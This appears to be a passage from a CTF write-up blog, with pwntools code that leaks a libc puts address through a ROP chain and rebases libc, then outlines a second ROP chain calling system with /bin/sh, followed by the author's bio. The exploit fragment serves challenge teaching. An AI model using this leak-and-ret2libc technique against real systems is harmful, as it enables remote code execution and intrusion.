Leaking the address from this ROP chain and rebasing the libc address in pwntools is below:

# Be sure to add the zeros that we miss due to string read# Grab the first 8 bytes of our output bufferleaked_puts=r.recv()[:8].strip().ljust(8,'\x00')# Convert to integerleaked_puts=struct.unpack('Q',leaked_puts)[0]# Rebase libc to the leaked offsetlibc.address=leaked_puts-libc.symbols['puts']

From here, we can create a second ROP which will simply call system with /bin/sh. Luckily, /bin/sh is in libc, so we simply find where that string is, and call system with it.

Cory Duplantis

I am a senior security researcher for Cisco Talos and play on Samurai for CTFs. Being happily married, CTFs, tool development, and singing barbershop take up the majority of my time. This blog is the home for my CTF writeups, development tricks, and other random hacker tips.